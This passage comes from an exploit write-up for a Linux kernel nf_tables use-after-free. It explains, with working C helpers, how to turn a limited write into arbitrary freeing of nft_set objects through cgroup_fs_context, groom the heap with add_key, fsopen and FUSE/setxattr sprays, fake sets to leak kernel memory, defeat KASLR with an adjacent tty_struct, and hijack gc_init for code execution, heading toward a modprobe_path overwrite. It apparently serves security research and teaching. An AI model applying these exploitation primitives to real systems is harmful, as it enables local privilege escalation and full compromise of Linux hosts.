    //https://elixir.bootlin.com/linux/v5.13/source/kernel/cgroup/cgroup.c#L2123
    /*
     * Initialise the cgroup filesystem creation/reconfiguration context. Notably,
     * we select the namespace we're going to use.
     */
    static int cgroup_init_fs_context(struct fs_context *fc)
    {
        struct cgroup_fs_context *ctx;

        ctx = kzalloc(sizeof(struct cgroup_fs_context), GFP_KERNEL);
        if (!ctx)
            return -ENOMEM;
        [...]
    }

In order to trigger this allocation, we can simply call the fsopen() system call and pass the "cgroup2" argument. If we want to free it after the fact, we can simply close the file descriptor (that was returned by fsopen()) with close(), and we can trigger the following code:

    /*
     * Destroy a cgroup filesystem context.
     */
    static void cgroup_fs_context_free(struct fs_context *fc)
    {
        struct cgroup_fs_context *ctx = cgroup_fc2context(fc);

        kfree(ctx->name);
        kfree(ctx->release_agent);
        put_cgroup_ns(ctx->ns);
        kernfs_free_fs_context(fc);
        kfree(ctx);
    }

We see that both name and release_agent are freed, so either is a good candidate for corruption during our limited UAF write.
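From userland, the allocate and free steps described above could be wrapped roughly as follows. This is a sketch, not code from our exploit: the helper names `cgroup_ctx_alloc()` and `cgroup_ctx_free()` are hypothetical, the fallback syscall number 430 is an assumption that holds on x86-64, and `fsopen()` may fail (for example with EPERM) if the caller lacks the required capability in its user namespace.

```c
#include <errno.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef SYS_fsopen
#define SYS_fsopen 430 /* assumption: fsopen syscall number on x86-64 */
#endif

/*
 * Ask the kernel to create a cgroup2 filesystem context. On success this
 * reaches cgroup_init_fs_context() and allocates a cgroup_fs_context.
 * Returns a file descriptor, or -1 with errno set.
 */
int cgroup_ctx_alloc(void)
{
    return (int)syscall(SYS_fsopen, "cgroup2", 0);
}

/*
 * Closing the descriptor tears the context down, which is expected to reach
 * cgroup_fs_context_free() and kfree() both name and release_agent.
 */
int cgroup_ctx_free(int fd)
{
    return close(fd);
}
```

Keeping the two steps as separate helpers makes it easy to hold a batch of contexts open and release a specific one at the moment the free is needed.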

What Pointer Do We Want to Arbitrary Free?

So now the next question is: if we use our limited UAF write to corrupt one of these pointers and free it by calling close(), what should we be freeing? A pointer relative to a set or an expression?

Arbitrary Freeing an Expression

If we free a “dynset” expression, the freed region starts at the address of nft_dynset->binding and is treated as a full 96-byte chunk. The binding member is the last member of the structure, so most of that region overlaps whatever target object is adjacent on the slab cache (or potentially an adjacent cache). This is both good and bad. It is good because we can potentially replace and corrupt the contents of an adjacent target object. It is bad because the randomized layout of slabs doesn’t let us know exactly which target object we will be able to corrupt, which adds extra complexity. We can’t leak what target object is adjacent or test whether the expression we are freeing is the last one in a slab, so this approach would be blind.

The following sequence of diagrams shows what freeing a target object adjacent to the expression would look like.

Above we assume that we’ve got a setup where we can write to some “free primitive” object by linking in some new expression that is added to the bindings list after our UAF is triggered. For the sake of example, we just say “primitive_object”, but in our exploit, it is actually a cgroup_fs_context structure.



This means we can destroy “primitive_object” from userland in order to free the kernel pointer that was written into ptr1. In our exploit, this would be destroying a “cgroup” in order to free cgroup_fs_context, which in turn will free cgroup_fs_context->name.

Finally, we actually destroy the “primitive_object” from userland in order to free the kernel address, which gives us a free chunk overlapping both the expression object and some adjacent target object.

From here, we could replace the newly freed overlapping chunk with something like a setxattr() allocation, which would let us control the data, but as mentioned before we don’t easily know what is adjacent and it adds unpredictability to what will already be a fairly complex setup. This is especially annoying in the case that the expression you are targeting is the last object in a slab cache, because it is harder to know what is on the adjacent cache, though there was a good paper about this recently by @ETenal7.

Arbitrary Freeing a Set

On the other hand, if we free an address relative to the set, we are freeing from the address of nft_set->bindings, which is only at offset 0x10. This means that we can free and replace the vast majority of a nft_set structure, but continue to interact with it as if it was legitimate. This also means we don’t have to rely on knowing the adjacent chunk.
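As a small illustration of the 0x10 offset, the sketch below recovers the base of a set from the address of its bindings member. `mock_nft_set` is a hypothetical stand-in that only models the two leading `list_head` members (on an LP64 target this places `bindings` at offset 0x10); everything after them is treated as opaque.

```c
#include <stddef.h>
#include <stdint.h>

struct list_head { struct list_head *next, *prev; };

/* Hypothetical model: only the two leading list heads matter here. */
struct mock_nft_set {
    struct list_head list;      /* offset 0x00: linkage in the table's set list */
    struct list_head bindings;  /* offset 0x10: head of the bindings list       */
    unsigned char rest[64];     /* opaque placeholder for the remaining members */
};

/* Number of bytes at the start of the set that lie before the freed address. */
size_t bytes_before_free_start(void)
{
    return offsetof(struct mock_nft_set, bindings);
}

/* Given a leaked &set->bindings, compute the address of the set itself. */
uintptr_t set_base_from_bindings(uintptr_t leaked_bindings)
{
    return leaked_bindings - offsetof(struct mock_nft_set, bindings);
}
```

Only the first 16 bytes of the set sit before the freed address, which is why a replacement object placed at `&set->bindings` can stand in for nearly all of the structure.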

After doing some investigation into options and what would potentially be exploitable, we opted to try to target nft_set. Next, we will take a look at why we thought this was potentially a very powerful target. At this point, we only know we can free some other structure type, so we still have a long way to go.

First, let’s revisit the nft_set structure and see what potential it has, assuming we can use-after-free it.

There are a number of useful members that we touched on earlier, but we can now review them within the context of exploitation.

Setting and Leaking Data

There are two interesting members of the nft_set related to leaking and controlling data.

- udata: A pointer into the set’s data inline array (which holds user supplied data).

- udlen: The length of user defined data stored in the set’s data array.

What this means is that:

- It is possible to pass arbitrary data which will be stored within the set object.

- In the case of an attacker controlling the udata pointer, this can then be used to leak arbitrary data from kernel space to user space up to the length of udlen by using the userland APIs to fetch the set.
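The leak idea can be pictured with a tiny userland model. This is only a sketch: `mock_set` and `mock_dump_udata()` are hypothetical names, and the function merely imitates a "get set" handler that copies `udlen` bytes from wherever `udata` points into the reply.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical model of the two members that matter for the leak. */
struct mock_set {
    const unsigned char *udata; /* normally points at the set's own inline data */
    uint16_t udlen;             /* number of bytes returned to userland         */
};

/*
 * Imitates the reply path: copy udlen bytes starting at udata. If an attacker
 * controls udata, the copy reads from an address of their choosing.
 */
size_t mock_dump_udata(const struct mock_set *set, unsigned char *out, size_t out_len)
{
    size_t n = set->udlen < out_len ? set->udlen : out_len;

    memcpy(out, set->udata, n);
    return n;
}
```

If `udata` is redirected at some other buffer, the bytes of that buffer come back in the reply, which is the arbitrary read primitive in miniature.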

Querying the Set by Name or ID

In order to look up a set, one of the following members is used, depending on the functionality:

- name: The name of the set is often required.

- handle: Certain APIs can lookup a nft_set by handle alone.

This means that if it was not possible to avoid corrupting the name, then it may still be possible to use certain APIs with the handle alone.

Set Function Table

The ops member of nft_set contains a pointer to a function table of set operations nft_set_ops:

    /**
     * struct nft_set_ops - nf_tables set operations
     *
     * @lookup: look up an element within the set
     * @update: update an element if exists, add it if doesn't exist
     * @delete: delete an element
     * @insert: insert new element into set
     * @activate: activate new element in the next generation
     * @deactivate: lookup for element and deactivate it in the next generation
     * @flush: deactivate element in the next generation
     * @remove: remove element from set
     * @walk: iterate over all set elements
     * @get: get set elements
     * @privsize: function to return size of set private data
     * @init: initialize private data of new set instance
     * @destroy: destroy private data of set instance
     * @elemsize: element private size
     *
     * Operations lookup, update and delete have simpler interfaces, are faster
     * and currently only used in the packet path. All the rest are slower,
     * control plane functions.
     */
    struct nft_set_ops {
        bool   (*lookup)(const struct net *net,
                         const struct nft_set *set,
                         const u32 *key,
                         const struct nft_set_ext **ext);
        bool   (*update)(struct nft_set *set,
                         const u32 *key,
                         void *(*new)(struct nft_set *,
                                      const struct nft_expr *,
                                      struct nft_regs *),
                         const struct nft_expr *expr,
                         struct nft_regs *regs,
                         const struct nft_set_ext **ext);
        bool   (*delete)(const struct nft_set *set,
                         const u32 *key);

        int    (*insert)(const struct net *net,
                         const struct nft_set *set,
                         const struct nft_set_elem *elem,
                         struct nft_set_ext **ext);
        void   (*activate)(const struct net *net,
                           const struct nft_set *set,
                           const struct nft_set_elem *elem);
        void * (*deactivate)(const struct net *net,
                             const struct nft_set *set,
                             const struct nft_set_elem *elem);
        bool   (*flush)(const struct net *net,
                        const struct nft_set *set,
                        void *priv);
        void   (*remove)(const struct net *net,
                         const struct nft_set *set,
                         const struct nft_set_elem *elem);
        void   (*walk)(const struct nft_ctx *ctx,
                       struct nft_set *set,
                       struct nft_set_iter *iter);
        void * (*get)(const struct net *net,
                      const struct nft_set *set,
                      const struct nft_set_elem *elem,
                      unsigned int flags);

        u64    (*privsize)(const struct nlattr * const nla[],
                           const struct nft_set_desc *desc);
        bool   (*estimate)(const struct nft_set_desc *desc,
                           u32 features,
                           struct nft_set_estimate *est);
        int    (*init)(const struct nft_set *set,
                       const struct nft_set_desc *desc,
                       const struct nlattr * const nla[]);
        void   (*destroy)(const struct nft_set *set);
        void   (*gc_init)(const struct nft_set *set);

        unsigned int elemsize;
    };

Therefore, if it is possible to hijack any of these function pointers or fake the table itself, then it may be possible to leverage this to control the instruction pointer and start executing a ROP chain.

Building the Exploit

So now that we know we want to free a nft_set to build better primitives, we still have three immediate things to solve:

- In order to use certain features of a controlled nft_set after replacing it with a fake set, we are going to need to leak some other kernel address where we control some memory.

- We need to write the target set address to the UAF chunk corrupting the cgroup_fs_context structure, in order to free it afterwards.

- Once we free the nft_set, we need some mechanism that allows us to replace the contents with completely controlled data to construct a malicious fake set that allows us to use our new primitives.

Let’s approach each problem one by one and outline a solution.

Problem One: Leaking Some Slab Address

In order to abuse a UAF of a nft_set we will need to leak a kernel address.

If we want to provide a controlled pointer for something like nft_set->udata, then we need to know some existing kernel address in the first place. This is actually quite easy to solve by just exploiting our existing UAF bug in a slightly different way.

We just need to bind an expression to the set we are targeting in advance, so that the set->bindings list already has one member. Then, we trigger the vulnerability to add the dangling pointer to the list. Finally, we can simply remove the preexisting list entry. Since it is a doubly linked list, the removal will update the prev entry of the following member on the list.



Since we know that we can write the address of a set to a new chunk, we can theoretically use some structure or buffer that we could read the contents of after the fact back to userland to leak what is written by the unlink operation. We opted to do this using the user_key_payload structure, since the pointer is written to the payload portion of the user_key_payload structure which we can easily read from user space.

Spraying the kernel heap with add_key is a well-known technique because it allows allocations of a controlled length. It is also possible to control when each allocation is free’d and to read back its data.

Each user_key_payload has a header followed by the data provided:

    struct user_key_payload {
        struct rcu_head rcu;
        unsigned short  datalen;
    };

We can spray user_key_payload as follows:

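    #include <stdint.h>
    #include <stdio.h>
    #include <unistd.h>
    #include <sys/syscall.h>
    #include <linux/keyctl.h>

    /* Allocate one "user" key; the kernel copies the payload into a user_key_payload. */
    static inline int32_t key_alloc(char *description, int8_t *payload,
                                    int32_t payload_len)
    {
        return syscall(__NR_add_key, "user", description, payload, payload_len,
                       KEY_SPEC_PROCESS_KEYRING);
    }

    /* Spray spray_count keys; description must have room for the "_<i>" suffix. */
    static inline void key_spray(int32_t *keys, int32_t spray_count,
                                 int8_t *payload, int32_t payload_len,
                                 char *description, int32_t description_len)
    {
        for (int32_t i = 0; i < spray_count; i++) {
            snprintf(description + description_len, 100, "_%d", i);
            keys[i] = key_alloc(description, payload, payload_len);
            if (keys[i] == -1) {
                perror("add_key");
                break;
            }
        }
    }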

We can also control when the free occurs using KEYCTL_UNLINK:

    /* Unlink the key from the process keyring so its payload can be freed. */
    static inline int32_t key_free(int32_t key_id)
    {
        return syscall(__NR_keyctl, KEYCTL_UNLINK, key_id,
                       KEY_SPEC_PROCESS_KEYRING);
    }

And we can read back the content of the payload after corruption has occurred using KEYCTL_READ and leak the set pointer back to userland:

    int32_t err = syscall(__NR_keyctl, KEYCTL_READ, keys[i], payload, payload_len);
    if (err == -1) {
        perror("keyctl_read");
    }
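Once a payload has been read back, it still has to be checked for the leaked address. One possible approach, sketched below, is to spray with a known fill byte and scan each payload for an 8-byte word that no longer matches the fill and has the upper bits of a kernel pointer. The helper `find_leaked_pointer()` is hypothetical, and the `0xffff` test assumes x86-64 canonical kernel addresses.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Scan a payload that was originally filled with `fill` for the first aligned
 * 8-byte word that changed and looks like a kernel address. On success the
 * value is stored in *leak and its payload offset is returned; otherwise -1.
 */
long find_leaked_pointer(const uint8_t *payload, size_t len, uint8_t fill,
                         uint64_t *leak)
{
    uint64_t expected;

    /* Build the 8-byte pattern an untouched word would still contain. */
    memset(&expected, fill, sizeof(expected));

    for (size_t off = 0; off + sizeof(uint64_t) <= len; off += sizeof(uint64_t)) {
        uint64_t q;

        memcpy(&q, payload + off, sizeof(q));
        /* Assumption: kernel pointers have their top 16 bits set on x86-64. */
        if (q != expected && (q >> 48) == 0xffff) {
            *leak = q;
            return (long)off;
        }
    }
    return -1;
}
```

Running this over every key in the spray identifies both which key replaced the freed expression and the value that was written into it.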

Visually, the leakage process based on user_key_payload looks as follows.



To help us keep track of this, we introduce a new naming convention. SET1 refers to the nft_set that is targeted the first time we trigger the vulnerability, when we leak the SET1 address into a user_key_payload payload. We will refer to this first triggering of the vulnerability as UAF1. We will include these terms in the exploit glossary at the end of this blog post, as they are used throughout this document.

We bind a “dynset” expression to SET1, which already has one legitimate expression on its bindings list:

The “dynset” expression is deemed invalid because it is not stateful, and so freed, leaving its address dangling on the bindings list:

We allocate a user_key_payload object to replace the hole left by freeing “dynset”:



Finally, we destroy the legitimate expression to update the linkage on the bindings list, effectively writing the address of SET1->bindings into the user_key_payload object, which can then be read from userland:

This means we will now trigger the limited UAF write twice: for leaking some kernel address and then for corrupting some structure. It also means that we are going to be using two different sets, one for each time the bug is triggered.
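The unlink step described above can be modeled entirely in userland. The following sketch is a simplified simulation with a hand-rolled doubly linked list, not kernel code: `struct chunk` stands in for the memory that first holds the “dynset” expression and is later reused by the key payload, and all names are ours for illustration.

```c
#include <stdbool.h>
#include <string.h>

struct list_head {
    struct list_head *next, *prev;
};

static void list_init(struct list_head *head)
{
    head->next = head;
    head->prev = head;
}

static void list_add_tail(struct list_head *entry, struct list_head *head)
{
    entry->prev = head->prev;
    entry->next = head;
    head->prev->next = entry;
    head->prev = entry;
}

static void list_del(struct list_head *entry)
{
    entry->next->prev = entry->prev;
    entry->prev->next = entry->next;
}

/* Stand-in for the chunk that is freed while still on the bindings list. */
struct chunk {
    char header[24];
    struct list_head binding;
    char tail[24];
};

static bool unlink_writes_head_into_stale_chunk(void)
{
    struct list_head bindings;   /* plays the role of SET1->bindings */
    struct list_head legit;      /* binding of the legitimate expression */
    static struct chunk stale;   /* the dangling "dynset" chunk */

    list_init(&bindings);
    list_add_tail(&legit, &bindings);
    list_add_tail(&stale.binding, &bindings);

    /* "Free" and reuse the chunk: the new owner fills it with its own data. */
    memset(&stale, 0x41, sizeof(stale));

    /* Destroying the legitimate expression unlinks it from the list ... */
    list_del(&legit);

    /* ... which stores the address of the list head into the stale chunk. */
    return stale.binding.prev == &bindings;
}
```

In this model the only write into the reused chunk is the address of the list head, which is why the primitive is a limited write of a value we do not choose.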

A funny side note about this stage: one of us was doing the testing on VMware, where this stage of the exploit was extremely unreliable. The user_key_payload chunk would very rarely replace the UAF dynset expression chunk, and the system would typically hit an unrecoverable oops. After a bunch of investigation, we realized that the cause was a debug message printed just before the user_key_payload allocation: the associated graphical output handling in the VMware graphics driver always allocated an object of the exact same size before we actually triggered the user_key_payload allocation.

These little reliability quirks are things we often run into, but not a lot of people talk about them. Kyle Zeng discusses in a recent paper how you need to minimize any noise between the point where you free a chunk and the point where you replace it. This is a good example of where that was needed, and also of how the development practice of printing debug output can get in the way.





Problem Two: Preparing a Set Freeing Primitive

Now that we have leaked the address of SET1, we need to figure out how we can write a set address into a UAF chunk in order to corrupt the cgroup_fs_context structure. This is very similar to what we did above, but instead of a user_key_payload we use a cgroup_fs_context, which lets us overwrite cgroup_fs_context->release_agent with set->bindings.



From here on, SET2 refers to the nft_set that is targeted the second time we trigger the bug. We refer to this second trigger as UAF2.

Visually this process looks as follows.

Once again, we add a “dynset” to the bindings list of a set:

The “dynset” object will be freed after being deemed invalid, due to being non-stateful. It is left dangling on the bindings list:

We replace the hole left by the “dynset” object, with a cgroup_fs_context object:



We free the legitimate expression to write the address of SET2->bindings over cgroup_fs_context->release_agent:

Doing the allocation of cgroup_fs_context looks like the following:

    inline int fsopen(const char * fs_name, unsigned int flags)
    {
        return syscall(__NR_fsopen, fs_name, flags);
    }

    void cgroup_spray(int spray_count, int * array_cgroup, int start_index, int thread_index)
    {
        int i = 0;
        for (i = 0; i < spray_count; i++) {
            // Each fsopen() allocates one cgroup_fs_context
            int fd = fsopen("cgroup2", 0);
            if (-1 == fd) {
                perror("fsopen");
                break;
            }
            array_cgroup[start_index+i] = fd;
        }
    }

And this is for freeing them:

    // Closing the file descriptor frees the associated cgroup_fs_context
    inline void cgroup_free(int fd)
    {
        close(fd);
    }

    void cgroup_free_array(int * cgroup, int count)
    {
        for (int i = 0; i < count; i++) {
            cgroup_free(cgroup[i]);
        }
    }

Now that we are able to write an address relative to SET2 into the cgroup_fs_context->release_agent field, we can free SET2 by freeing the cgroup.

Problem Three: Building a Fake Set

Finally, after we free SET2 by closing the cgroup, we need some mechanism that allows us to replace its contents with completely controlled data, so that we can construct a malicious fake set and build new primitives from it.

Since we needed to control a lot of the data, we thought about msg_msg. However, msg_msg won’t be on the same slab cache for the 5.15 kernel version we are targeting (due to a new set of kmalloc-cg-* caches being introduced in 5.14).

We opted to use the popular FUSE/setxattr() combination. We won’t get into detail on this as it has been covered by many articles previously, e.g.:







This lets us control all of the values in SET2. By carefully crafting them, it allows us to continue to interact with the set as if it were real. We will refer to the first fake set that we create as FAKESET1. We will refer to the process of freeing SET2 and replacing it with FAKESET1 as UAF3.



At this point, we visually have the following.

Before freeing the cgroup:

After freeing the SET2->bindings by closing the cgroup file descriptor:

After replacing SET2 with FAKESET1, using setxattr() to allocate an object whose data copy is blocked by the FUSE server:



By having a FAKESET1->udata value pointing at SET1, this opens up some more powerful memory revelation possibilities:

We are starting to have good exploitation primitives to work with but we still have a long way to go!

Bypassing KASLR

The next challenge we faced was how to bypass KASLR.

Our goal will eventually be to try to swap out the ops function table in a set, and in order to point it at new functions, we will need to populate some memory with KASLR-aware pointers and then point ops to this location. We can’t simply point it at SET1 in advance, even though we can provide data inside of SET1 user data section. This is because we have not bypassed KASLR at this stage, so we can’t pre-populate valid pointers in that location (chicken and egg problem).

However, we did come up with one trick which is to leak the address of SET2 when leaking SET1 contents. This is possible because, as mentioned earlier, when you add sets they are associated with the table, and all of the sets in the same table are on a linked list. We can abuse this by ensuring that SET1 and SET2 are both associated with this same table. What this means is that the first entry of SET1->list will point to SET2.

    /**
     *	struct nft_table - nf_tables table
     *
     *	@list: used internally
     *	@chains_ht: chains in the table
     *	@chains: same, for stable walks
     *	@sets: sets in the table
     [...]
     */
    struct nft_table {
        struct list_head    list;
        struct rhltable     chains_ht;
        struct list_head    chains;
        struct list_head    sets;
        [...]
    };

Above we can see the nft_table structure. We just want to highlight the sets member, which will be the list that sets are on when associated with the same table.

Given we just said we can’t update SET1 after the fact, under normal circumstances that would mean that we can’t update SET2 after the fact either, right? However, because SET2 is now in a state where the contents are controlled by FAKESET1, it means we can actually free it again by releasing the FUSE/setxattr() and replacing it again with a new fake set FAKESET2, where we add addresses that we leaked from abusing FAKESET1 for memory revelation.

That’s our plan at least. We still don’t have a way to bypass KASLR. We can leak some code addresses, in that we can leak the address of nf_tables.ko via SET1->ops, but this is a relatively small kernel module. We would much rather be able to leak the address of the full kernel image itself, since it opens up many more possibilities for things like ROP gadgets.

The idea we had was that we can already leak the contents of SET1 thanks to our FAKESET1 replacing SET2. To do this, we simply point FAKESET1->udata to SET1. However on top of that, we can actually control the length of data that we can read, which can be significantly larger than the size of SET1. By adjusting FAKESET1->udlen to be larger than the size of a set, we can just easily leak adjacent chunks. This means that before allocating SET1, we can also prepare kernel memory such that SET1 is allocated before some object type that has a function pointer that will allow us to defeat KASLR.

After some investigation we chose to use the tty_struct structure, which has two versions (master and slave) but both end up pointing to the kernel, and can be used to defeat KASLR. The only problem is that tty_struct is allocated on kmalloc-1k, whereas nft_set is allocated on kmalloc-512. To address this problem, we realized that when we create the set we can supply a small amount of user data that will be stored inline in the object, and the length of this data will dictate the size of the allocation. The default size is very close to 512, so just supplying a little bit of data is enough to push it over the edge and cause the set to be allocated on kmalloc-1k.

An example of another recent exploit using tty_struct is as follows.

As an example, we will show creating a dynamic set with controlled user data using nftnl_set_set_data() from libnftnl:

    /**
     * Create a dynamic nftnl_set in userland using libnftnl
     *
     * @param[in] table_name: the table name to link the set to
     * @param[in] set_name: the set name to create
     * @param[in] family: at what network level the table needs to be created (e.g. AF_INET)
     * @param[in] set_id:
     * @param[in] expr:
     * @param[in] expr_count:
     * @return the created nftnl_set
     */
    struct nftnl_set * build_set_dynamic(char * table_name, char * set_name,
                                         uint16_t family, uint32_t set_id,
                                         struct nftnl_expr ** expr, uint32_t expr_count,
                                         char * user_data, int data_len)
    {
        struct nftnl_set * s;

        s = nftnl_set_alloc();

        nftnl_set_set_str(s, NFTNL_SET_TABLE, table_name);
        nftnl_set_set_str(s, NFTNL_SET_NAME, set_name);
        nftnl_set_set_u32(s, NFTNL_SET_KEY_LEN, 1);
        nftnl_set_set_u32(s, NFTNL_SET_FAMILY, family);
        nftnl_set_set_u32(s, NFTNL_SET_ID, set_id);

        // NFTA_SET_FLAGS this is a bitmask of enum nft_set_flags
        uint32_t flags = NFT_SET_EVAL;
        nftnl_set_set_u32(s, NFTNL_SET_FLAGS, flags);

        // If an expression exists then add it.
        if (expr && expr_count != 0) {
            if (expr_count > 1) {
                nftnl_set_set_u32(s, NFTNL_SET_FLAGS, NFT_SET_EXPR);
            }

            for (uint32_t i = 0; i < expr_count; ++i) {
                nftnl_set_add_expr(s, *expr++);
            }
        }

        if (user_data && data_len > 0) {
            // the data len is set automatically
            // ubuntu_22.04_kernel_5.15.0-27/net/netfilter/nf_tables_api.c#1129
            nftnl_set_set_data(s, NFTNL_SET_USERDATA, user_data, data_len);
        }

        return s;
    }
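How much user data is needed to push the set into the next cache can be worked out with simple arithmetic. The sketch below assumes the generic kmalloc size classes commonly seen on x86-64 and takes the size of the set allocation without user data as a parameter (`base_size`), since that value has to be measured on the target kernel. The helper names are hypothetical.

```c
#include <stddef.h>

/* Generic kmalloc size classes (assumed; verify against /proc/slabinfo). */
static const size_t kmalloc_classes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Size class that serves an allocation of `size` bytes, or 0 if too large. */
static size_t kmalloc_class_for(size_t size)
{
    size_t n = sizeof(kmalloc_classes) / sizeof(kmalloc_classes[0]);

    for (size_t i = 0; i < n; i++) {
        if (size <= kmalloc_classes[i])
            return kmalloc_classes[i];
    }
    return 0;
}

/*
 * Smallest user data length that makes an allocation of base_size bytes
 * land in target_class. Returns (size_t)-1 if no length works.
 */
static size_t min_udlen_for_class(size_t base_size, size_t target_class)
{
    for (size_t udlen = 0; udlen <= target_class; udlen++) {
        if (kmalloc_class_for(base_size + udlen) == target_class)
            return udlen;
    }
    return (size_t)-1;
}
```

For example, with a hypothetical `base_size` of 500 bytes, 13 bytes of user data are enough to move the allocation from the 512-byte class to the 1024-byte class. The result would be passed as `data_len` to `build_set_dynamic()`.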

In order to be relatively sure that a tty_struct is adjacent to the nft_set, we can spray a small number of them to make sure any holes are filled on other slabs, then allocate the set, and finally spray a few more such that at minimum a complete slab will have been filled.
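Once a tty_struct sits right after SET1, the over-read buffer can be turned into a kernel base address. The following is a minimal sketch under several assumptions: the leak starts at the first byte of SET1's chunk, the neighbor begins exactly one slot later, and both the offset of the function-table pointer inside the neighbor (`field_off`) and the offset of that table from the kernel base (`symbol_off`) are known for the target build. All names and parameters here are hypothetical placeholders.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * leak:        bytes read back, starting at the first byte of SET1's chunk
 * slot_size:   size of one object in the cache (1024 for kmalloc-1k)
 * field_off:   offset of the function-table pointer inside the neighbor
 * symbol_off:  offset of that function table from the kernel base
 *
 * Returns the computed kernel base, or 0 if the leak is too short or the
 * value found does not look like a kernel pointer.
 */
static uint64_t kernel_base_from_neighbor(const unsigned char *leak,
                                          size_t leak_len,
                                          size_t slot_size,
                                          size_t field_off,
                                          uint64_t symbol_off)
{
    size_t off = slot_size + field_off;
    uint64_t ptr;

    if (off + sizeof(ptr) > leak_len)
        return 0;

    memcpy(&ptr, leak + off, sizeof(ptr));

    /* Reject anything outside the upper canonical half. */
    if ((ptr >> 48) != 0xffff || ptr < symbol_off)
        return 0;

    return ptr - symbol_off;
}
```

A return value of 0 is a signal that the neighbor is not the expected object, in which case the safest option is to restart rather than continue with a bad base address.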

There are still some scenarios where this could technically fail, specifically because of the random layout of slab objects on a cache. Indeed, it is possible that the SET1 object is at the very last slot of the slab, and thus reading out of bounds will end up reading whatever is adjacent. This might be a completely different slab type. We thought of one convenient way of detecting this which is that because a given slab size has a constant offset for each object on this slab, and we know the size of the nft_set objects, when we leak the address of SET1, we can actually determine whether or not it is in the last slot of the slab, in which case we can just start the exploit again by allocating a new SET1.

This calculation is quite easy, as long as you know the size of the objects and the number of objects per slab:

    bool is_last_slab_slot(uintptr_t addr, uint32_t size, int32_t count)
    {
        // Offset of the last object from the start of the slab
        uint32_t last_slot_offset = size*(count - 1);
        if ((addr & last_slot_offset) == last_slot_offset) {
            return true;
        }
        return false;
    }

This is convenient in that it lets us short circuit the whole exploit process after UAF1 and start again from the beginning, rather than waiting all the way until we are done with UAF4 to see that it failed.
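As a worked example of the same idea, the slot index can be computed explicitly. This sketch assumes that a slab is aligned to `size * count` bytes and that `addr` is the start of the object (that is, the leaked SET1->bindings address with the offset of the bindings member already subtracted). The function names and the numbers in the usage note are illustrative only.

```c
#include <stdbool.h>
#include <stdint.h>

/* Index of the slot that holds addr, assuming naturally aligned slabs. */
static uint32_t slab_slot_index(uint64_t addr, uint32_t size, uint32_t count)
{
    uint64_t slab_bytes = (uint64_t)size * count;

    return (uint32_t)((addr % slab_bytes) / size);
}

/* True if addr is the last object of its slab. */
static bool is_last_slot(uint64_t addr, uint32_t size, uint32_t count)
{
    return slab_slot_index(addr, size, count) == count - 1;
}
```

With a hypothetical layout of 32 objects of 1024 bytes per slab, an object at 0xffff888012347c00 is in slot 31, the last one, so the exploit would restart. An object at 0xffff888012340400 is in slot 1 and has a neighbor on the same slab.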



Getting Code Execution

So now that we can bypass KASLR, we can set up another fake set which has an ops function table pointing to legitimate addresses, and work towards getting code execution. We refer to this final fake set as FAKESET2. In order to create it, we simply free FAKESET1 by unblocking the setxattr() call via FUSE, and then immediately reallocate the same memory with another setxattr() call blocked by FUSE. We refer to this final stage as UAF4.

In addition to controlling ops, we again obviously control a fair bit of data inside of FAKESET2 that may help us with something like a stack pivot or other ROP gadget. So the next step is to try to find what kind of control we have when executing the function pointers exposed by our ops. This turned out to be an interesting challenge, because the registers controlled for most of the functions exposed by ops are actually very limited.

We started off by mapping out each possible function call and what registers could be controlled.

An example of a few are as follows:

    // called by nft_setelem_get():
    //   rsi = set
    //   r12 = set
    void * (*get)(const struct net *net,
                  const struct nft_set *set,
                  const struct nft_set_elem *elem,
                  unsigned int flags);

    // called by nft_set_destroy():
    //   rdi = set
    //   r12 = set
    void (*destroy)(const struct nft_set *set);

    // called by nft_set_elem_expr_alloc():
    //   r14 = set
    //   rdi = set
    void (*gc_init)(const struct nft_set *set);

RIP Control by Triggering Garbage Collection

In the end, we decided to try to target the set->ops->gc_init function pointer, because the register control seemed slightly better for ROP gadget hunting.

    struct nft_expr *nft_set_elem_expr_alloc(const struct nft_ctx *ctx,
                                             const struct nft_set *set,
                                             const struct nlattr *attr)
    {
        struct nft_expr *expr;
        int err;

        expr = nft_expr_init(ctx, attr);
        if (IS_ERR(expr))
            return expr;

        err = -EOPNOTSUPP;
        if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL))
            goto err_set_elem_expr;

    [1] if (expr->ops->type->flags & NFT_EXPR_GC) {
            if (set->flags & NFT_SET_TIMEOUT)
                goto err_set_elem_expr;
    [2]     if (!set->ops->gc_init)
                goto err_set_elem_expr;
    [3]     set->ops->gc_init(set);
        }
        [...]
    }

First, we had to figure out how we could reach this call at all. The call at [3] is only reached when the expression carries the garbage collection flag ([1]) and the set's ops expose a gc_init() function ([2]). The majority of expressions do not set this flag at all, which precludes the use of most of them.

We did find that the nft_connlimit expression will work as it is one of the only ones that has this garbage collection flag.

We just need to make sure that the right kernel module has been loaded in advance, as it wasn’t by default. Loading the module via the command line can be done with something like this:

    nft add table ip filter
    nft add chain ip filter input '{ type filter hook input priority 0; }'
    nft add rule ip filter input tcp dport 22 ct count 10 counter accept

This allows the user to create a nft_connlimit expression to reach the gc_init() function by simply creating an expression and adding it to a set:

nftnl_expr_alloc("connlimit");

modprobe_path Overwrite